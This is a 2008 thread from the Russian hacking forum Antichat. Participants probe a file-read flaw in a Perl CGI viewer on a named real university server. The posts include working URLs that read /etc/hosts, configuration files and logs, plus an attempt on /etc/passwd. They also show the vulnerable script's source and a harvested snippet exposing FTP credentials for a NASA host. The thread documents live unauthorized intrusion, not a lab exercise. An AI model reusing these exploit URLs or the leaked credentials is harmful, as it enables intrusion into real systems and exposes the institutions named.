Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   wtf NaviServer/2.0 AOLserver/2.1 ? (https://forum.antichat.xyz/showthread.php?t=82314)

$n@ke 25.08.2008 17:10

wtf NaviServer/2.0 AOLserver/2.1 ?
 
Нашел читалку на одном хосте, cgi скрипт.
судя по некоторым данным, которые смог собрать - на хосте стоит NaviServer/2.0 AOLserver/2.1.
что это такое, с чем его едят?Может ктото сталкивалса уже? Гугля спросил, очень много мусора в инфе, пока нет времени разгребать. Жду от вас предложений.

/etc/passwd почему то не открывается..загрузка и всё(
/etc/hosts есть.

.Slip 26.08.2008 11:09

Ссылку мб?

$n@ke 26.08.2008 19:11

никсы стоят, это понятно...можно даже какбе читать диры, но бред получается ужасный..

вот линка:
Цитата:

http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/etc/hosts

.Slip 26.08.2008 20:16

Как бы читалка предусмотренная. И единственное что может быть, они не расставили права как следует.

http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=viewfile.cgi

Код:

#!/usr/local/bin/perl
 use CGI;
 use CGI::Carp qw(fatalsToBrowser);

 $q = new CGI;
 $file = $q->param('file');
 print $q->header;
 print $q->start_html(-title=>"$file",-bgcolor=>'white');
 print "<IMG SRC=\"/NS/Asset/notice.gif\">";
 print "<HR><p>";
 unless (-e $file) { print "no such file: $file" ; exit }
 open(FILE,"<$file");
 while (<FILE>) {
        print " $_ <br>\n";
 }
 close FILE;
 print "<HR> ";
 print $q->end_html;


$n@ke 26.08.2008 21:59

это то да, но если б знать где конфиги от таких сервисов - было б намного легче. По сути ничего про них никто не знает?

heks 26.08.2008 22:25

нашел вот это
$host = "soap.nascom.nasa.gov";
$host = "nanuk.nascom.nasa.gov";

chdir("$INCOMING");
for my $gid (@GIDS) {


unless($pid1=fork) { #child process
#
# retrieve aqua l1a
#
my $wget ="wget -nc \"ftp://public:TArc5255\@${host}/pub/${platform}1/MODIS/MOD01/*$gid*\"";

heks 27.08.2008 10:20

сайт уже в дауне
http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/dbrowse.cgi
http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/etc/autopush.conf
http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/data/noaa/etc/get-noaa.pl вроде вот эта
http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/etc/autopush.conf
http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/tmp/ext-noaa-pm.log
http://miracle.rsmas.miami.edu/modis/projects/viewfile.cgi?file=/var/etc/amd.master
ссылок много а вот в которой нашел непомню :(


Время: 21:56